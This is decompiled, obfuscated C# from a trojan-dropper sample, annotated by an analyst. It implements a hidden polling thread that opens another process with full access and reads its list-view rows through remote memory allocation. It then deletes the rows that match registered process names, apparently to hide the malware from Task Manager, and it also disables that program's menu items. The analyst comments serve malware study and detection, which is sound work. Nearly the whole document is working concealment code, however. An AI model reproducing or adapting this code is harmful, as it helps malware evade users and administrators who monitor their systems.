// Decompiled with JetBrains decompiler
// Type: .
// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
//
// Analyst notes (added during review; the code below is unchanged):
//  * Every identifier is obfuscated to a control character (\u0001, \u0002, ...), and several
//    members share one name and differ only by type or signature. The listing is therefore
//    readable but cannot be recompiled or safely renamed.
//  * String literals are not present in this type. They are fetched at run time through the
//    delegate field \u0005.\u0001, called with integer keys (2426, 2439, 2504, 911). The
//    decoded values are not visible here, so every statement below about a window, query or
//    method name is an inference and is marked as one.
//  * All native calls go through the obfuscated type \u0006, whose declarations are not shown.
//    API names in the comments are inferred from argument shapes and well-known constants.
//  * Overall behaviour, as far as the visible code shows: a background thread polls another
//    process's window every 10 ms, reads rows of a control inside it, and sends message 4104
//    (0x1008, the value of LVM_DELETEITEM) for rows that match a registered process name plus
//    a second string. This is consistent with hiding entries from a process-list UI.

using \u0001;
using \u0008;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Management;
using System.Runtime.InteropServices;
using System.Threading;

namespace \u0008
{
  internal static class \u0005
  {
    // Delegate used as a string lookup: invoked with an int key wherever a string is needed.
    // Presumably the obfuscator's string decoder; it is set up outside this type (see the
    // static constructor's call into \u0003) - confirm against that type.
    [NonSerialized]
    internal static \u0002 \u0001;
    // bool: true once the polling thread has been started.
    private static bool \u0001;
    // DateTime: time of the last periodic 273 (0x0111) message sent to the target main window.
    private static DateTime \u0001;
    // int: row count observed on the previous pass, used to detect that the list changed.
    private static int \u0001;
    // bool: set when a new process is registered, forcing a full rescan on the next pass.
    private static bool \u0002;

    /// <summary>
    /// Registers <paramref name="obj0"/> as a process whose rows should be removed from the
    /// monitored list, starting the polling thread on first use.
    /// </summary>
    /// <param name="obj0">Process whose name and second match string are recorded.</param>
    public static void \u000F([In] Process obj0)
    {
      if (!\u0005.\u0001)
        \u0005.\u000F();
      // The constructor adds the new descriptor to the shared static list as a side effect;
      // the local itself is never used again.
      \u0005.\u0001 obj = new \u0005.\u0001(obj0);
      \u0005.\u0002 = true;
    }

    /// <summary>
    /// Starts a foreground thread that runs the scan routine forever with a 10 ms pause
    /// between passes, then marks the poller as started.
    /// </summary>
    private static void \u000F()
    {
      // Not marked IsBackground, so this thread keeps the host process alive.
      // Detection note: a tight 10 ms loop doing cross-process window messaging and
      // process-handle opens is a steady, observable behavioural pattern.
      new Thread((ThreadStart) (() =>
      {
        while (true)
        {
          \u0005.\u0010();
          Thread.Sleep(10);
        }
      })).Start();
      \u0005.\u0001 = true;
    }

    /// <summary>
    /// One scan pass over the target window: adjusts its menu, triggers periodic commands,
    /// reads the list rows and deletes those matching a registered descriptor.
    /// Any exception ends the pass silently.
    /// </summary>
    private static void \u0010()
    {
      try
      {
        // Target process name comes from the encoded string with key 2426 (value not visible).
        // Indexing [0] throws when no such process is running; the empty catch below absorbs it.
        IntPtr mainWindowHandle = Process.GetProcessesByName(\u0005.\u0001(2426))[0].MainWindowHandle;
        // Size-prefixed struct filled by a native call on the main window; field \u0003 is then
        // compared with 1 and 3. Shape is consistent with WINDOWPLACEMENT.showCmd being
        // SW_SHOWNORMAL (1) or SW_SHOWMAXIMIZED (3) - TODO confirm against \u0006's declarations.
        \u0006.\u0004 structure = new \u0006.\u0004();
        structure.\u0001 = Marshal.SizeOf((object) structure);
        \u0006.\u000F(mainWindowHandle, ref structure);
        bool flag1 = structure.\u0003 == 1 || structure.\u0003 == 3;
        // num1: handle of the control with ID 1009 inside the first child window of the target
        // (presumably FindWindowEx followed by GetDlgItem). This is the list that is read and edited.
        IntPtr num1 = \u0006.\u000F(\u0006.\u000F(mainWindowHandle, IntPtr.Zero, (string) null, (string) null), 1009);
        // num2..num5: handles/IDs derived from the main window by position (2, 1, 0). The call
        // shapes look like GetMenu / GetSubMenu / GetMenuItemID - presumably menu navigation.
        IntPtr num2 = \u0006.\u000F(mainWindowHandle);
        IntPtr num3 = \u0006.\u0010(num2, 2);
        IntPtr num4 = \u0006.\u0010(num3, 1);
        uint num5 = \u0006.\u000F(num3, 0);
        if (num4 != IntPtr.Zero)
        {
          // 273 == 0x0111, the value of WM_COMMAND: sends the command ID found at position 3 of
          // the nested item, then makes a second call on (num3, num4, 1), presumably removing or
          // disabling that nested item. Exact API not confirmable here.
          \u0006.\u000F(mainWindowHandle, 273U, (IntPtr) (long) \u0006.\u000F(num4, 3), IntPtr.Zero);
          \u0006.\u0010(num3, (uint) (int) num4, 1U);
        }
        // Call on (menu, item ID, 1); with flag value 1 this resembles EnableMenuItem/MF_GRAYED.
        \u0006.\u000F(num2, num5, 1U);
        // When the window is shown normally or maximized, a call is made on the list handle here
        // and the same function is called with IntPtr.Zero at the end of the pass. That pairing
        // is consistent with LockWindowUpdate(hwnd) ... LockWindowUpdate(NULL) to suppress
        // repainting while rows are removed - TODO confirm.
        if (flag1)
          \u0006.\u000F(num1);
        // At most once per second, send the command ID num5 to the main window as message 273.
        if ((DateTime.Now - \u0005.\u0001).TotalMilliseconds > 1000.0)
        {
          \u0006.\u000F(mainWindowHandle, 273U, (IntPtr) (long) num5, IntPtr.Zero);
          \u0005.\u0001 = DateTime.Now;
        }
        // Forced collection on every pass, i.e. roughly every 10 ms.
        GC.Collect();
        // 4100 == 0x1004, the value of LVM_GETITEMCOUNT: num6 is the current number of rows.
        int num6 = (int) \u0006.\u000F(num1, 4100U, IntPtr.Zero, \u0005.\u0001(911));
        // Rescan only when the row count changed or a new process was registered.
        if (num6 != \u0005.\u0001 || \u0005.\u0002)
        {
          \u0005.\u0002 = false;
          \u0005.\u0001 = num6;
          for (int index1 = 0; index1 < num6; ++index1)
          {
            // Read up to 10 cells of the row, lower-cased. Reading stops as soon as a later
            // column returns the same text as column 0; the repeated value is still stored, and
            // the remaining slots stay null.
            string[] strArray = new string[10];
            for (int index2 = 0; index2 < 10; ++index2)
            {
              strArray[index2] = \u0005.\u000F(num1, index1, index2).ToLower();
              if (index2 > 0 && strArray[index2] == strArray[0])
                break;
            }
            // NOTE(review): the list is enumerated here without the lock that the descriptor
            // constructor takes when adding; a concurrent registration would throw and be
            // swallowed by the empty catch.
            foreach (\u0005.\u0001 obj in \u0005.\u0001.\u0001)
            {
              bool flag2 = false;
              bool flag3 = false;
              // flag2: some cell starts with the registered process name.
              // flag3: some other cell equals the descriptor's second string exactly.
              for (int index3 = 0; index3 < 10 && strArray[index3] != null && (!flag2 || !flag3); ++index3)
              {
                if (strArray[index3].StartsWith(obj.\u0001))
                  flag2 = true;
                else if (strArray[index3] == obj.\u0002)
                  flag3 = true;
              }
              if (flag2 && flag3)
              {
                // 4104 == 0x1008, the value of LVM_DELETEITEM: remove this row from the control.
                // index1 is post-decremented so the next iteration revisits the same position,
                // and the cached row count is decremented to match.
                \u0006.\u000F(num1, 4104U, (IntPtr) index1--, IntPtr.Zero);
                --\u0005.\u0001;
                break;
              }
            }
          }
        }
        if (!flag1)
          return;
        \u0006.\u000F(IntPtr.Zero);
      }
      // Swallows every exception type with no logging, so failures leave no trace.
      catch
      {
      }
    }

    /// <summary>
    /// Reads the text of one cell (row <paramref name="obj1"/>, column <paramref name="obj2"/>)
    /// from the control <paramref name="obj0"/>, which lives in another process, by staging a
    /// request structure in that process's memory.
    /// </summary>
    /// <param name="obj0">Window handle of the list control.</param>
    /// <param name="obj1">Row index written into the request structure.</param>
    /// <param name="obj2">Column index written into the request structure.</param>
    /// <returns>The ANSI string read back from the staged buffer.</returns>
    private static string \u000F([In] IntPtr obj0, [In] int obj1, [In] int obj2)
    {
      // Field layout (uint mask, int row, int column, IntPtr text pointer, int max length) is
      // consistent with the Win32 LVITEM structure - TODO confirm against \u0006.\u0001.
      \u0006.\u0001 obj = new \u0006.\u0001();
      IntPtr hglobal = Marshal.AllocHGlobal(1024);
      uint lpdwProcessId;
      // Owning process ID of the control (call shape matches GetWindowThreadProcessId).
      int num1 = (int) \u0006.\u000F(obj0, out lpdwProcessId);
      // 2035711 == 0x1F0FFF, the PROCESS_ALL_ACCESS mask: presumably OpenProcess on the owner.
      // Detection note: this runs once per cell read, so process-access telemetry would show
      // the same caller repeatedly opening the same target with a full-access mask.
      IntPtr num2 = \u0006.\u000F(2035711U, false, (int) lpdwProcessId);
      // 1024 bytes requested with 4096 (0x1000, MEM_COMMIT) and 4 (PAGE_READWRITE): presumably
      // VirtualAllocEx in the target process.
      IntPtr num3 = \u0006.\u000F(num2, IntPtr.Zero, 1024U, 4096U, 4U);
      obj.\u0001 = 1U;
      obj.\u0001 = obj1;
      obj.\u0002 = obj2;
      // Text buffer is placed directly after the structure inside the remote allocation.
      obj.\u0001 = (IntPtr) ((int) num3 + Marshal.SizeOf(typeof (\u0006.\u0001)));
      obj.\u0003 = 50;
      // Copy the request into the remote block (presumably WriteProcessMemory), send message
      // 4101 (0x1005, the value of LVM_GETITEMA) with the remote address, then copy all 1024
      // bytes back into the local buffer (presumably ReadProcessMemory).
      \u0006.\u000F(num2, num3, ref obj, Marshal.SizeOf(typeof (\u0006.\u0001)), 0);
      \u0006.\u000F(obj0, 4101U, IntPtr.Zero, num3);
      \u0006.\u000F(num2, num3, hglobal, 1024, 0);
      string stringAnsi = Marshal.PtrToStringAnsi((IntPtr) ((int) hglobal + Marshal.SizeOf(typeof (\u0006.\u0001))));
      Marshal.FreeHGlobal(hglobal);
      // 32768 == 0x8000 (MEM_RELEASE): frees the remote block, then closes the process handle
      // (presumably VirtualFreeEx and CloseHandle).
      \u0006.\u000F(num2, num3, 0, 32768U);
      \u0006.\u0010(num2);
      return stringAnsi;
    }

    /// <summary>
    /// Runs a WMI query built from an encoded prefix plus the process ID and invokes an encoded
    /// method name on each result, returning the first out-argument when the method returns 0.
    /// </summary>
    /// <param name="obj0">Process whose ID is appended to the query text.</param>
    /// <returns>
    /// The first element of the argument array after a successful call; otherwise the string
    /// for key 911.
    /// </returns>
    private static string \u000F([In] Process obj0)
    {
      // Query prefix (key 2439) and method name (key 2504) are encoded. The pattern - a query
      // keyed by process ID, a method that returns 0 on success and fills a string argument -
      // resembles Win32_Process.GetOwner returning the owning user name. TODO confirm by
      // decoding the strings.
      foreach (ManagementObject managementObject in new ManagementObjectSearcher(\u0005.\u0001(2439) + (object) obj0.Id).Get())
      {
        string[] args = new string[1]{ \u0005.\u0001(911) };
        if (Convert.ToInt32(managementObject.InvokeMethod(\u0005.\u0001(2504), (object[]) args)) == 0)
          return args[0];
      }
      return \u0005.\u0001(911);
    }

    // Type initializer: calls into \u0003 (not shown; presumably initialises the string
    // delegate above) and seeds the timestamp used for the once-per-second command.
    static \u0005()
    {
      \u0003.\u000F();
      \u0005.\u0001 = DateTime.Now;
    }

    /// <summary>
    /// Descriptor of one registered process: its lower-cased name and a second lower-cased
    /// string obtained from the WMI helper. Each instance adds itself to a shared static list.
    /// </summary>
    private sealed class \u0001
    {
      // Shared registry of all descriptors; read by the scan routine on the polling thread.
      public static List<\u0005.\u0001> \u0001 = new List<\u0005.\u0001>();
      // Lower-cased Process.ProcessName; matched with StartsWith against row cells.
      public string \u0001;
      // Lower-cased result of the WMI helper; matched by exact equality against row cells.
      public string \u0002;

      public \u0001([In] Process obj0)
      {
        this.\u0001 = obj0.ProcessName.ToLower();
        this.\u0002 = \u0005.\u000F(obj0).ToLower();
        // Locks the list itself while adding.
        lock (\u0005.\u0001.\u0001)
          \u0005.\u0001.\u0001.Add(this);
      }
    }
  }
}